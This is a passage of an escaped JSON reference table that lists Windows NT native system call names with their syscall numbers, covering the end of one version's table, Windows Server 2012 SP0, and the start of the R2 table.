\"137\", \"NtCommitTransaction\": \"138\", \"NtCompactKeys\": \"139\", \"NtCompareTokens\": \"140\", \"NtCompleteConnectPort\": \"141\", \"NtCompressKey\": \"142\", \"NtConnectPort\": \"143\", \"NtCreateDebugObject\": \"144\", \"NtCreateDirectoryObject\": \"145\", \"NtCreateEnlistment\": \"146\", \"NtCreateEventPair\": \"147\", \"NtCreateIoCompletion\": \"148\", \"NtCreateJobObject\": \"149\", \"NtCreateJobSet\": \"150\", \"NtCreateKeyTransacted\": \"151\", \"NtCreateKeyedEvent\": \"152\", \"NtCreateMailslotFile\": \"153\", \"NtCreateMutant\": \"154\", \"NtCreateNamedPipeFile\": \"155\", \"NtCreatePagingFile\": \"156\", \"NtCreatePort\": \"157\", \"NtCreatePrivateNamespace\": \"158\", \"NtCreateProcess\": \"159\", \"NtCreateProfile\": \"160\", \"NtCreateProfileEx\": \"161\", \"NtCreateResourceManager\": \"162\", \"NtCreateSemaphore\": \"163\", \"NtCreateSymbolicLinkObject\": \"164\", \"NtCreateThreadEx\": \"165\", \"NtCreateTimer\": \"166\", \"NtCreateToken\": \"167\", \"NtCreateTransaction\": \"168\", \"NtCreateTransactionManager\": \"169\", \"NtCreateUserProcess\": \"170\", \"NtCreateWaitablePort\": \"171\", \"NtCreateWorkerFactory\": \"172\", \"NtDebugActiveProcess\": \"173\", \"NtDebugContinue\": \"174\", \"NtDeleteAtom\": \"175\", \"NtDeleteBootEntry\": \"176\", \"NtDeleteDriverEntry\": \"177\", \"NtDeleteFile\": \"178\", \"NtDeleteKey\": \"179\", \"NtDeleteObjectAuditAlarm\": \"180\", \"NtDeletePrivateNamespace\": \"181\", \"NtDeleteValueKey\": \"182\", \"NtDisableLastKnownGood\": \"183\", \"NtDisplayString\": \"184\", \"NtDrawText\": \"185\", \"NtEnableLastKnownGood\": \"186\", \"NtEnumerateBootEntries\": \"187\", \"NtEnumerateDriverEntries\": \"188\", \"NtEnumerateSystemEnvironmentValuesEx\": \"189\", \"NtEnumerateTransactionObject\": \"190\", \"NtExtendSection\": \"191\", \"NtFilterToken\": \"192\", \"NtFlushInstallUILanguage\": \"193\", \"NtFlushInstructionCache\": \"194\", \"NtFlushKey\": \"195\", \"NtFlushProcessWriteBuffers\": \"196\", \"NtFlushVirtualMemory\": \"197\", \"NtFlushWriteBuffer\": \"198\", \"NtFreeUserPhysicalPages\": \"199\", \"NtFreezeRegistry\": \"200\", \"NtFreezeTransactions\": \"201\", \"NtGetContextThread\": \"202\", \"NtGetCurrentProcessorNumber\": \"203\", \"NtGetDevicePowerState\": \"204\", \"NtGetMUIRegistryInfo\": \"205\", \"NtGetNextProcess\": \"206\", \"NtGetNextThread\": \"207\", \"NtGetNlsSectionPtr\": \"208\", \"NtGetNotificationResourceManager\": \"209\", \"NtGetPlugPlayEvent\": \"210\", \"NtGetWriteWatch\": \"211\", \"NtImpersonateAnonymousToken\": \"212\", \"NtImpersonateThread\": \"213\", \"NtInitializeNlsFiles\": \"214\", \"NtInitializeRegistry\": \"215\", \"NtInitiatePowerAction\": \"216\", \"NtIsSystemResumeAutomatic\": \"217\", \"NtIsUILanguageComitted\": \"218\", \"NtListenPort\": \"219\", \"NtLoadDriver\": \"220\", \"NtLoadKey\": \"221\", \"NtLoadKey2\": \"222\", \"NtLoadKeyEx\": \"223\", \"NtLockFile\": \"224\", \"NtLockProductActivationKeys\": \"225\", \"NtLockRegistryKey\": \"226\", \"NtLockVirtualMemory\": \"227\", \"NtMakePermanentObject\": \"228\", \"NtMakeTemporaryObject\": \"229\", \"NtMapCMFModule\": \"230\", \"NtMapUserPhysicalPages\": \"231\", \"NtModifyBootEntry\": \"232\", \"NtModifyDriverEntry\": \"233\", \"NtNotifyChangeDirectoryFile\": \"234\", \"NtNotifyChangeKey\": \"235\", \"NtNotifyChangeMultipleKeys\": \"236\", \"NtNotifyChangeSession\": \"237\", \"NtOpenEnlistment\": \"238\", \"NtOpenEventPair\": \"239\", \"NtOpenIoCompletion\": \"240\", \"NtOpenJobObject\": \"241\", \"NtOpenKeyEx\": \"242\", \"NtOpenKeyTransacted\": \"243\", \"NtOpenKeyTransactedEx\": \"244\", \"NtOpenKeyedEvent\": \"245\", \"NtOpenMutant\": \"246\", \"NtOpenObjectAuditAlarm\": \"247\", \"NtOpenPrivateNamespace\": \"248\", \"NtOpenProcessToken\": \"249\", \"NtOpenResourceManager\": \"250\", \"NtOpenSemaphore\": \"251\", \"NtOpenSession\": \"252\", \"NtOpenSymbolicLinkObject\": \"253\", \"NtOpenThread\": \"254\", \"NtOpenTimer\": \"255\", \"NtOpenTransaction\": \"256\", \"NtOpenTransactionManager\": \"257\", \"NtPlugPlayControl\": \"258\", \"NtPrePrepareComplete\": \"259\", \"NtPrePrepareEnlistment\": \"260\", \"NtPrepareComplete\": \"261\", \"NtPrepareEnlistment\": \"262\", \"NtPrivilegeCheck\": \"263\", \"NtPrivilegeObjectAuditAlarm\": \"264\", \"NtPrivilegedServiceAuditAlarm\": \"265\", \"NtPropagationComplete\": \"266\", \"NtPropagationFailed\": \"267\", \"NtPulseEvent\": \"268\", \"NtQueryBootEntryOrder\": \"269\", \"NtQueryBootOptions\": \"270\", \"NtQueryDebugFilterState\": \"271\", \"NtQueryDirectoryObject\": \"272\", \"NtQueryDriverEntryOrder\": \"273\", \"NtQueryEaFile\": \"274\", \"NtQueryFullAttributesFile\": \"275\", \"NtQueryInformationAtom\": \"276\", \"NtQueryInformationEnlistment\": \"277\", \"NtQueryInformationJobObject\": \"278\", \"NtQueryInformationPort\": \"279\", \"NtQueryInformationResourceManager\": \"280\", \"NtQueryInformationTransaction\": \"281\", \"NtQueryInformationTransactionManager\": \"282\", \"NtQueryInformationWorkerFactory\": \"283\", \"NtQueryInstallUILanguage\": \"284\", \"NtQueryIntervalProfile\": \"285\", \"NtQueryIoCompletion\": \"286\", \"NtQueryLicenseValue\": \"287\", \"NtQueryMultipleValueKey\": \"288\", \"NtQueryMutant\": \"289\", \"NtQueryOpenSubKeys\": \"290\", \"NtQueryOpenSubKeysEx\": \"291\", \"NtQueryPortInformationProcess\": \"292\", \"NtQueryQuotaInformationFile\": \"293\", \"NtQuerySecurityAttributesToken\": \"294\", \"NtQuerySecurityObject\": \"295\", \"NtQuerySemaphore\": \"296\", \"NtQuerySymbolicLinkObject\": \"297\", \"NtQuerySystemEnvironmentValue\": \"298\", \"NtQuerySystemEnvironmentValueEx\": \"299\", \"NtQuerySystemInformationEx\": \"300\", \"NtQueryTimerResolution\": \"301\", \"NtQueueApcThreadEx\": \"302\", \"NtRaiseException\": \"303\", \"NtRaiseHardError\": \"304\", \"NtReadOnlyEnlistment\": \"305\", \"NtRecoverEnlistment\": \"306\", \"NtRecoverResourceManager\": \"307\", \"NtRecoverTransactionManager\": \"308\", \"NtRegisterProtocolAddressInformation\": \"309\", \"NtRegisterThreadTerminatePort\": \"310\", \"NtReleaseKeyedEvent\": \"311\", \"NtReleaseWorkerFactoryWorker\": \"312\", \"NtRemoveIoCompletionEx\": \"313\", \"NtRemoveProcessDebug\": \"314\", \"NtRenameKey\": \"315\", \"NtRenameTransactionManager\": \"316\", \"NtReplaceKey\": \"317\", \"NtReplacePartitionUnit\": \"318\", \"NtReplyWaitReplyPort\": \"319\", \"NtRequestPort\": \"320\", \"NtResetEvent\": \"321\", \"NtResetWriteWatch\": \"322\", \"NtRestoreKey\": \"323\", \"NtResumeProcess\": \"324\", \"NtRollbackComplete\": \"325\", \"NtRollbackEnlistment\": \"326\", \"NtRollbackTransaction\": \"327\", \"NtRollforwardTransactionManager\": \"328\", \"NtSaveKey\": \"329\", \"NtSaveKeyEx\": \"330\", \"NtSaveMergedKeys\": \"331\", \"NtSecureConnectPort\": \"332\", \"NtSerializeBoot\": \"333\", \"NtSetBootEntryOrder\": \"334\", \"NtSetBootOptions\": \"335\", \"NtSetContextThread\": \"336\", \"NtSetDebugFilterState\": \"337\", \"NtSetDefaultHardErrorPort\": \"338\", \"NtSetDefaultLocale\": \"339\", \"NtSetDefaultUILanguage\": \"340\", \"NtSetDriverEntryOrder\": \"341\", \"NtSetEaFile\": \"342\", \"NtSetHighEventPair\": \"343\", \"NtSetHighWaitLowEventPair\": \"344\", \"NtSetInformationDebugObject\": \"345\", \"NtSetInformationEnlistment\": \"346\", \"NtSetInformationJobObject\": \"347\", \"NtSetInformationKey\": \"348\", \"NtSetInformationResourceManager\": \"349\", \"NtSetInformationToken\": \"350\", \"NtSetInformationTransaction\": \"351\", \"NtSetInformationTransactionManager\": \"352\", \"NtSetInformationWorkerFactory\": \"353\", \"NtSetIntervalProfile\": \"354\", \"NtSetIoCompletion\": \"355\", \"NtSetIoCompletionEx\": \"356\", \"NtSetLdtEntries\": \"357\", \"NtSetLowEventPair\": \"358\", \"NtSetLowWaitHighEventPair\": \"359\", \"NtSetQuotaInformationFile\": \"360\", \"NtSetSecurityObject\": \"361\", \"NtSetSystemEnvironmentValue\": \"362\", \"NtSetSystemEnvironmentValueEx\": \"363\", \"NtSetSystemInformation\": \"364\", \"NtSetSystemPowerState\": \"365\", \"NtSetSystemTime\": \"366\", \"NtSetThreadExecutionState\": \"367\", \"NtSetTimerEx\": \"368\", \"NtSetTimerResolution\": \"369\", \"NtSetUuidSeed\": \"370\", \"NtSetVolumeInformationFile\": \"371\", \"NtShutdownSystem\": \"372\", \"NtShutdownWorkerFactory\": \"373\", \"NtSignalAndWaitForSingleObject\": \"374\", \"NtSinglePhaseReject\": \"375\", \"NtStartProfile\": \"376\", \"NtStopProfile\": \"377\", \"NtSuspendProcess\": \"378\", \"NtSuspendThread\": \"379\", \"NtSystemDebugControl\": \"380\", \"NtTerminateJobObject\": \"381\", \"NtTestAlert\": \"382\", \"NtThawRegistry\": \"383\", \"NtThawTransactions\": \"384\", \"NtTraceControl\": \"385\", \"NtTranslateFilePath\": \"386\", \"NtUmsThreadYield\": \"387\", \"NtUnloadDriver\": \"388\", \"NtUnloadKey\": \"389\", \"NtUnloadKey2\": \"390\", \"NtUnloadKeyEx\": \"391\", \"NtUnlockFile\": \"392\", \"NtUnlockVirtualMemory\": \"393\", \"NtVdmControl\": \"394\", \"NtWaitForDebugEvent\": \"395\", \"NtWaitForKeyedEvent\": \"396\", \"NtWaitForWorkViaWorkerFactory\": \"397\", \"NtWaitHighEventPair\": \"398\", \"NtWaitLowEventPair\": \"399\", \"NtWorkerFactoryWorkerReady\": \"400\"}}, \"Windows Server 2012\": {\"SP0\": {\"NtWorkerFactoryWorkerReady\": \"0\", \"NtMapUserPhysicalPagesScatter\": \"1\", \"NtWaitForSingleObject\": \"2\", \"NtCallbackReturn\": \"3\", \"NtReadFile\": \"4\", \"NtDeviceIoControlFile\": \"5\", \"NtWriteFile\": \"6\", \"NtRemoveIoCompletion\": \"7\", \"NtReleaseSemaphore\": \"8\", \"NtReplyWaitReceivePort\": \"9\", \"NtReplyPort\": \"10\", \"NtSetInformationThread\": \"11\", \"NtSetEvent\": \"12\", \"NtClose\": \"13\", \"NtQueryObject\": \"14\", \"NtQueryInformationFile\": \"15\", \"NtOpenKey\": \"16\", \"NtEnumerateValueKey\": \"17\", \"NtFindAtom\": \"18\", \"NtQueryDefaultLocale\": \"19\", \"NtQueryKey\": \"20\", \"NtQueryValueKey\": \"21\", \"NtAllocateVirtualMemory\": \"22\", \"NtQueryInformationProcess\": \"23\", \"NtWaitForMultipleObjects32\": \"24\", \"NtWriteFileGather\": \"25\", \"NtSetInformationProcess\": \"26\", \"NtCreateKey\": \"27\", \"NtFreeVirtualMemory\": \"28\", \"NtImpersonateClientOfPort\": \"29\", \"NtReleaseMutant\": \"30\", \"NtQueryInformationToken\": \"31\", \"NtRequestWaitReplyPort\": \"32\", \"NtQueryVirtualMemory\": \"33\", \"NtOpenThreadToken\": \"34\", \"NtQueryInformationThread\": \"35\", \"NtOpenProcess\": \"36\", \"NtSetInformationFile\": \"37\", \"NtMapViewOfSection\": \"38\", \"NtAccessCheckAndAuditAlarm\": \"39\", \"NtUnmapViewOfSection\": \"40\", \"NtReplyWaitReceivePortEx\": \"41\", \"NtTerminateProcess\": \"42\", \"NtSetEventBoostPriority\": \"43\", \"NtReadFileScatter\": \"44\", \"NtOpenThreadTokenEx\": \"45\", \"NtOpenProcessTokenEx\": \"46\", \"NtQueryPerformanceCounter\": \"47\", \"NtEnumerateKey\": \"48\", \"NtOpenFile\": \"49\", \"NtDelayExecution\": \"50\", \"NtQueryDirectoryFile\": \"51\", \"NtQuerySystemInformation\": \"52\", \"NtOpenSection\": \"53\", \"NtQueryTimer\": \"54\", \"NtFsControlFile\": \"55\", \"NtWriteVirtualMemory\": \"56\", \"NtCloseObjectAuditAlarm\": \"57\", \"NtDuplicateObject\": \"58\", \"NtQueryAttributesFile\": \"59\", \"NtClearEvent\": \"60\", \"NtReadVirtualMemory\": \"61\", \"NtOpenEvent\": \"62\", \"NtAdjustPrivilegesToken\": \"63\", \"NtDuplicateToken\": \"64\", \"NtContinue\": \"65\", \"NtQueryDefaultUILanguage\": \"66\", \"NtQueueApcThread\": \"67\", \"NtYieldExecution\": \"68\", \"NtAddAtom\": \"69\", \"NtCreateEvent\": \"70\", \"NtQueryVolumeInformationFile\": \"71\", \"NtCreateSection\": \"72\", \"NtFlushBuffersFile\": \"73\", \"NtApphelpCacheControl\": \"74\", \"NtCreateProcessEx\": \"75\", \"NtCreateThread\": \"76\", \"NtIsProcessInJob\": \"77\", \"NtProtectVirtualMemory\": \"78\", \"NtQuerySection\": \"79\", \"NtResumeThread\": \"80\", \"NtTerminateThread\": \"81\", \"NtReadRequestData\": \"82\", \"NtCreateFile\": \"83\", \"NtQueryEvent\": \"84\", \"NtWriteRequestData\": \"85\", \"NtOpenDirectoryObject\": \"86\", \"NtAccessCheckByTypeAndAuditAlarm\": \"87\", \"NtQuerySystemTime\": \"88\", \"NtWaitForMultipleObjects\": \"89\", \"NtSetInformationObject\": \"90\", \"NtCancelIoFile\": \"91\", \"NtTraceEvent\": \"92\", \"NtPowerInformation\": \"93\", \"NtSetValueKey\": \"94\", \"NtCancelTimer\": \"95\", \"NtSetTimer\": \"96\", \"NtAcceptConnectPort\": \"97\", \"NtAccessCheck\": \"98\", \"NtAccessCheckByType\": \"99\", \"NtAccessCheckByTypeResultList\": \"100\", \"NtAccessCheckByTypeResultListAndAuditAlarm\": \"101\", \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": \"102\", \"NtAddAtomEx\": \"103\", \"NtAddBootEntry\": \"104\", \"NtAddDriverEntry\": \"105\", \"NtAdjustGroupsToken\": \"106\", \"NtAdjustTokenClaimsAndDeviceGroups\": \"107\", \"NtAlertResumeThread\": \"108\", \"NtAlertThread\": \"109\", \"NtAlertThreadByThreadId\": \"110\", \"NtAllocateLocallyUniqueId\": \"111\", \"NtAllocateReserveObject\": \"112\", \"NtAllocateUserPhysicalPages\": \"113\", \"NtAllocateUuids\": \"114\", \"NtAlpcAcceptConnectPort\": \"115\", \"NtAlpcCancelMessage\": \"116\", \"NtAlpcConnectPort\": \"117\", \"NtAlpcConnectPortEx\": \"118\", \"NtAlpcCreatePort\": \"119\", \"NtAlpcCreatePortSection\": \"120\", \"NtAlpcCreateResourceReserve\": \"121\", \"NtAlpcCreateSectionView\": \"122\", \"NtAlpcCreateSecurityContext\": \"123\", \"NtAlpcDeletePortSection\": \"124\", \"NtAlpcDeleteResourceReserve\": \"125\", \"NtAlpcDeleteSectionView\": \"126\", \"NtAlpcDeleteSecurityContext\": \"127\", \"NtAlpcDisconnectPort\": \"128\", \"NtAlpcImpersonateClientOfPort\": \"129\", \"NtAlpcOpenSenderProcess\": \"130\", \"NtAlpcOpenSenderThread\": \"131\", \"NtAlpcQueryInformation\": \"132\", \"NtAlpcQueryInformationMessage\": \"133\", \"NtAlpcRevokeSecurityContext\": \"134\", \"NtAlpcSendWaitReceivePort\": \"135\", \"NtAlpcSetInformation\": \"136\", \"NtAreMappedFilesTheSame\": \"137\", \"NtAssignProcessToJobObject\": \"138\", \"NtAssociateWaitCompletionPacket\": \"139\", \"NtCancelIoFileEx\": \"140\", \"NtCancelSynchronousIoFile\": \"141\", \"NtCancelWaitCompletionPacket\": \"142\", \"NtCommitComplete\": \"143\", \"NtCommitEnlistment\": \"144\", \"NtCommitTransaction\": \"145\", \"NtCompactKeys\": \"146\", \"NtCompareTokens\": \"147\", \"NtCompleteConnectPort\": \"148\", \"NtCompressKey\": \"149\", \"NtConnectPort\": \"150\", \"NtCreateDebugObject\": \"151\", \"NtCreateDirectoryObject\": \"152\", \"NtCreateDirectoryObjectEx\": \"153\", \"NtCreateEnlistment\": \"154\", \"NtCreateEventPair\": \"155\", \"NtCreateIRTimer\": \"156\", \"NtCreateIoCompletion\": \"157\", \"NtCreateJobObject\": \"158\", \"NtCreateJobSet\": \"159\", \"NtCreateKeyTransacted\": \"160\", \"NtCreateKeyedEvent\": \"161\", \"NtCreateLowBoxToken\": \"162\", \"NtCreateMailslotFile\": \"163\", \"NtCreateMutant\": \"164\", \"NtCreateNamedPipeFile\": \"165\", \"NtCreatePagingFile\": \"166\", \"NtCreatePort\": \"167\", \"NtCreatePrivateNamespace\": \"168\", \"NtCreateProcess\": \"169\", \"NtCreateProfile\": \"170\", \"NtCreateProfileEx\": \"171\", \"NtCreateResourceManager\": \"172\", \"NtCreateSemaphore\": \"173\", \"NtCreateSymbolicLinkObject\": \"174\", \"NtCreateThreadEx\": \"175\", \"NtCreateTimer\": \"176\", \"NtCreateToken\": \"177\", \"NtCreateTokenEx\": \"178\", \"NtCreateTransaction\": \"179\", \"NtCreateTransactionManager\": \"180\", \"NtCreateUserProcess\": \"181\", \"NtCreateWaitCompletionPacket\": \"182\", \"NtCreateWaitablePort\": \"183\", \"NtCreateWnfStateName\": \"184\", \"NtCreateWorkerFactory\": \"185\", \"NtDebugActiveProcess\": \"186\", \"NtDebugContinue\": \"187\", \"NtDeleteAtom\": \"188\", \"NtDeleteBootEntry\": \"189\", \"NtDeleteDriverEntry\": \"190\", \"NtDeleteFile\": \"191\", \"NtDeleteKey\": \"192\", \"NtDeleteObjectAuditAlarm\": \"193\", \"NtDeletePrivateNamespace\": \"194\", \"NtDeleteValueKey\": \"195\", \"NtDeleteWnfStateData\": \"196\", \"NtDeleteWnfStateName\": \"197\", \"NtDisableLastKnownGood\": \"198\", \"NtDisplayString\": \"199\", \"NtDrawText\": \"200\", \"NtEnableLastKnownGood\": \"201\", \"NtEnumerateBootEntries\": \"202\", \"NtEnumerateDriverEntries\": \"203\", \"NtEnumerateSystemEnvironmentValuesEx\": \"204\", \"NtEnumerateTransactionObject\": \"205\", \"NtExtendSection\": \"206\", \"NtFilterBootOption\": \"207\", \"NtFilterToken\": \"208\", \"NtFilterTokenEx\": \"209\", \"NtFlushBuffersFileEx\": \"210\", \"NtFlushInstallUILanguage\": \"211\", \"NtFlushInstructionCache\": \"212\", \"NtFlushKey\": \"213\", \"NtFlushProcessWriteBuffers\": \"214\", \"NtFlushVirtualMemory\": \"215\", \"NtFlushWriteBuffer\": \"216\", \"NtFreeUserPhysicalPages\": \"217\", \"NtFreezeRegistry\": \"218\", \"NtFreezeTransactions\": \"219\", \"NtGetCachedSigningLevel\": \"220\", \"NtGetContextThread\": \"221\", \"NtGetCurrentProcessorNumber\": \"222\", \"NtGetDevicePowerState\": \"223\", \"NtGetMUIRegistryInfo\": \"224\", \"NtGetNextProcess\": \"225\", \"NtGetNextThread\": \"226\", \"NtGetNlsSectionPtr\": \"227\", \"NtGetNotificationResourceManager\": \"228\", \"NtGetWriteWatch\": \"229\", \"NtImpersonateAnonymousToken\": \"230\", \"NtImpersonateThread\": \"231\", \"NtInitializeNlsFiles\": \"232\", \"NtInitializeRegistry\": \"233\", \"NtInitiatePowerAction\": \"234\", \"NtIsSystemResumeAutomatic\": \"235\", \"NtIsUILanguageComitted\": \"236\", \"NtListenPort\": \"237\", \"NtLoadDriver\": \"238\", \"NtLoadKey\": \"239\", \"NtLoadKey2\": \"240\", \"NtLoadKeyEx\": \"241\", \"NtLockFile\": \"242\", \"NtLockProductActivationKeys\": \"243\", \"NtLockRegistryKey\": \"244\", \"NtLockVirtualMemory\": \"245\", \"NtMakePermanentObject\": \"246\", \"NtMakeTemporaryObject\": \"247\", \"NtMapCMFModule\": \"248\", \"NtMapUserPhysicalPages\": \"249\", \"NtModifyBootEntry\": \"250\", \"NtModifyDriverEntry\": \"251\", \"NtNotifyChangeDirectoryFile\": \"252\", \"NtNotifyChangeKey\": \"253\", \"NtNotifyChangeMultipleKeys\": \"254\", \"NtNotifyChangeSession\": \"255\", \"NtOpenEnlistment\": \"256\", \"NtOpenEventPair\": \"257\", \"NtOpenIoCompletion\": \"258\", \"NtOpenJobObject\": \"259\", \"NtOpenKeyEx\": \"260\", \"NtOpenKeyTransacted\": \"261\", \"NtOpenKeyTransactedEx\": \"262\", \"NtOpenKeyedEvent\": \"263\", \"NtOpenMutant\": \"264\", \"NtOpenObjectAuditAlarm\": \"265\", \"NtOpenPrivateNamespace\": \"266\", \"NtOpenProcessToken\": \"267\", \"NtOpenResourceManager\": \"268\", \"NtOpenSemaphore\": \"269\", \"NtOpenSession\": \"270\", \"NtOpenSymbolicLinkObject\": \"271\", \"NtOpenThread\": \"272\", \"NtOpenTimer\": \"273\", \"NtOpenTransaction\": \"274\", \"NtOpenTransactionManager\": \"275\", \"NtPlugPlayControl\": \"276\", \"NtPrePrepareComplete\": \"277\", \"NtPrePrepareEnlistment\": \"278\", \"NtPrepareComplete\": \"279\", \"NtPrepareEnlistment\": \"280\", \"NtPrivilegeCheck\": \"281\", \"NtPrivilegeObjectAuditAlarm\": \"282\", \"NtPrivilegedServiceAuditAlarm\": \"283\", \"NtPropagationComplete\": \"284\", \"NtPropagationFailed\": \"285\", \"NtPulseEvent\": \"286\", \"NtQueryBootEntryOrder\": \"287\", \"NtQueryBootOptions\": \"288\", \"NtQueryDebugFilterState\": \"289\", \"NtQueryDirectoryObject\": \"290\", \"NtQueryDriverEntryOrder\": \"291\", \"NtQueryEaFile\": \"292\", \"NtQueryFullAttributesFile\": \"293\", \"NtQueryInformationAtom\": \"294\", \"NtQueryInformationEnlistment\": \"295\", \"NtQueryInformationJobObject\": \"296\", \"NtQueryInformationPort\": \"297\", \"NtQueryInformationResourceManager\": \"298\", \"NtQueryInformationTransaction\": \"299\", \"NtQueryInformationTransactionManager\": \"300\", \"NtQueryInformationWorkerFactory\": \"301\", \"NtQueryInstallUILanguage\": \"302\", \"NtQueryIntervalProfile\": \"303\", \"NtQueryIoCompletion\": \"304\", \"NtQueryLicenseValue\": \"305\", \"NtQueryMultipleValueKey\": \"306\", \"NtQueryMutant\": \"307\", \"NtQueryOpenSubKeys\": \"308\", \"NtQueryOpenSubKeysEx\": \"309\", \"NtQueryPortInformationProcess\": \"310\", \"NtQueryQuotaInformationFile\": \"311\", \"NtQuerySecurityAttributesToken\": \"312\", \"NtQuerySecurityObject\": \"313\", \"NtQuerySemaphore\": \"314\", \"NtQuerySymbolicLinkObject\": \"315\", \"NtQuerySystemEnvironmentValue\": \"316\", \"NtQuerySystemEnvironmentValueEx\": \"317\", \"NtQuerySystemInformationEx\": \"318\", \"NtQueryTimerResolution\": \"319\", \"NtQueryWnfStateData\": \"320\", \"NtQueryWnfStateNameInformation\": \"321\", \"NtQueueApcThreadEx\": \"322\", \"NtRaiseException\": \"323\", \"NtRaiseHardError\": \"324\", \"NtReadOnlyEnlistment\": \"325\", \"NtRecoverEnlistment\": \"326\", \"NtRecoverResourceManager\": \"327\", \"NtRecoverTransactionManager\": \"328\", \"NtRegisterProtocolAddressInformation\": \"329\", \"NtRegisterThreadTerminatePort\": \"330\", \"NtReleaseKeyedEvent\": \"331\", \"NtReleaseWorkerFactoryWorker\": \"332\", \"NtRemoveIoCompletionEx\": \"333\", \"NtRemoveProcessDebug\": \"334\", \"NtRenameKey\": \"335\", \"NtRenameTransactionManager\": \"336\", \"NtReplaceKey\": \"337\", \"NtReplacePartitionUnit\": \"338\", \"NtReplyWaitReplyPort\": \"339\", \"NtRequestPort\": \"340\", \"NtResetEvent\": \"341\", \"NtResetWriteWatch\": \"342\", \"NtRestoreKey\": \"343\", \"NtResumeProcess\": \"344\", \"NtRollbackComplete\": \"345\", \"NtRollbackEnlistment\": \"346\", \"NtRollbackTransaction\": \"347\", \"NtRollforwardTransactionManager\": \"348\", \"NtSaveKey\": \"349\", \"NtSaveKeyEx\": \"350\", \"NtSaveMergedKeys\": \"351\", \"NtSecureConnectPort\": \"352\", \"NtSerializeBoot\": \"353\", \"NtSetBootEntryOrder\": \"354\", \"NtSetBootOptions\": \"355\", \"NtSetCachedSigningLevel\": \"356\", \"NtSetContextThread\": \"357\", \"NtSetDebugFilterState\": \"358\", \"NtSetDefaultHardErrorPort\": \"359\", \"NtSetDefaultLocale\": \"360\", \"NtSetDefaultUILanguage\": \"361\", \"NtSetDriverEntryOrder\": \"362\", \"NtSetEaFile\": \"363\", \"NtSetHighEventPair\": \"364\", \"NtSetHighWaitLowEventPair\": \"365\", \"NtSetIRTimer\": \"366\", \"NtSetInformationDebugObject\": \"367\", \"NtSetInformationEnlistment\": \"368\", \"NtSetInformationJobObject\": \"369\", \"NtSetInformationKey\": \"370\", \"NtSetInformationResourceManager\": \"371\", \"NtSetInformationToken\": \"372\", \"NtSetInformationTransaction\": \"373\", \"NtSetInformationTransactionManager\": \"374\", \"NtSetInformationVirtualMemory\": \"375\", \"NtSetInformationWorkerFactory\": \"376\", \"NtSetIntervalProfile\": \"377\", \"NtSetIoCompletion\": \"378\", \"NtSetIoCompletionEx\": \"379\", \"NtSetLdtEntries\": \"380\", \"NtSetLowEventPair\": \"381\", \"NtSetLowWaitHighEventPair\": \"382\", \"NtSetQuotaInformationFile\": \"383\", \"NtSetSecurityObject\": \"384\", \"NtSetSystemEnvironmentValue\": \"385\", \"NtSetSystemEnvironmentValueEx\": \"386\", \"NtSetSystemInformation\": \"387\", \"NtSetSystemPowerState\": \"388\", \"NtSetSystemTime\": \"389\", \"NtSetThreadExecutionState\": \"390\", \"NtSetTimerEx\": \"391\", \"NtSetTimerResolution\": \"392\", \"NtSetUuidSeed\": \"393\", \"NtSetVolumeInformationFile\": \"394\", \"NtShutdownSystem\": \"395\", \"NtShutdownWorkerFactory\": \"396\", \"NtSignalAndWaitForSingleObject\": \"397\", \"NtSinglePhaseReject\": \"398\", \"NtStartProfile\": \"399\", \"NtStopProfile\": \"400\", \"NtSubscribeWnfStateChange\": \"401\", \"NtSuspendProcess\": \"402\", \"NtSuspendThread\": \"403\", \"NtSystemDebugControl\": \"404\", \"NtTerminateJobObject\": \"405\", \"NtTestAlert\": \"406\", \"NtThawRegistry\": \"407\", \"NtThawTransactions\": \"408\", \"NtTraceControl\": \"409\", \"NtTranslateFilePath\": \"410\", \"NtUmsThreadYield\": \"411\", \"NtUnloadDriver\": \"412\", \"NtUnloadKey\": \"413\", \"NtUnloadKey2\": \"414\", \"NtUnloadKeyEx\": \"415\", \"NtUnlockFile\": \"416\", \"NtUnlockVirtualMemory\": \"417\", \"NtUnmapViewOfSectionEx\": \"418\", \"NtUnsubscribeWnfStateChange\": \"419\", \"NtUpdateWnfStateData\": \"420\", \"NtVdmControl\": \"421\", \"NtWaitForAlertByThreadId\": \"422\", \"NtWaitForDebugEvent\": \"423\", \"NtWaitForKeyedEvent\": \"424\", \"NtWaitForWnfNotifications\": \"425\", \"NtWaitForWorkViaWorkerFactory\": \"426\", \"NtWaitHighEventPair\": \"427\", \"NtWaitLowEventPair\": \"428\"}, \"R2\": {\"NtWorkerFactoryWorkerReady\": \"0\", \"NtAcceptConnectPort\": \"1\", \"NtMapUserPhysicalPagesScatter\": \"2\", \"NtWaitForSingleObject\": \"3\", \"NtCallbackReturn\": \"4\", \"NtReadFile\": \"5\", \"NtDeviceIoControlFile\": \"6\", \"NtWriteFile\": \"7\", \"NtRemoveIoCompletion\": \"8\", \"NtReleaseSemaphore\": \"9\", \"NtReplyWaitReceivePort\": \"10\", \"NtReplyPort\": \"11\", \"NtSetInformationThread\": \"12\", \"NtSetEvent\": \"13\", \"NtClose\": \"14\", \"NtQueryObject\": \"15\", \"NtQueryInformationFile\": \"16\", \"NtOpenKey\": \"17\", \"NtEnumerateValueKey\": \"18\", \"NtFindAtom\": \"19\", \"NtQueryDefaultLocale\": \"20\", \"NtQueryKey\": \"21\", \"NtQueryValueKey\": \"22\", \"NtAllocateVirtualMemory\": \"23\", \"NtQueryInformationProcess\": \"24\", \"NtWaitForMultipleObjects32\": \"25\", \"NtWriteFileGather\": \"26\", \"NtSetInformationProcess\": \"27\", \"NtCreateKey\": \"28\", \"NtFreeVirtualMemory\": \"29\", \"NtImpersonateClientOfPort\": \"30\", \"NtReleaseMutant\": \"31\", \"NtQueryInformationToken\": \"32\", \"NtRequestWaitReplyPort\": \"33\", \"NtQueryVirtualMemory\": \"34\", \"NtOpenThreadToken\": \"35\", \"NtQueryInformationThread\": \"36\", \"NtOpenProcess\": \"37\", \"NtSetInformationFile\": \"38\", \"NtMapViewOfSection\": \"39\", \"NtAccessCheckAndAuditAlarm\": \"40\", \"NtUnmapViewOfSection\": \"41\", \"NtReplyWaitReceivePortEx\": \"42\", \"NtTerminateProcess\": \"43\", \"NtSetEventBoostPriority\": \"44\", \"NtReadFileScatter\": \"45\", \"NtOpenThreadTokenEx\": \"46\", \"NtOpenProcessTokenEx\": \"47\", \"NtQueryPerformanceCounter\": \"48\", \"NtEnumerateKey\": \"49\", \"NtOpenFile\": \"50\", \"NtDelayExecution\": \"51\", \"NtQueryDirectoryFile\": \"52\", \"NtQuerySystemInformation\": \"53\", \"NtOpenSection\": \"54\", \"NtQueryTimer\": \"55\", 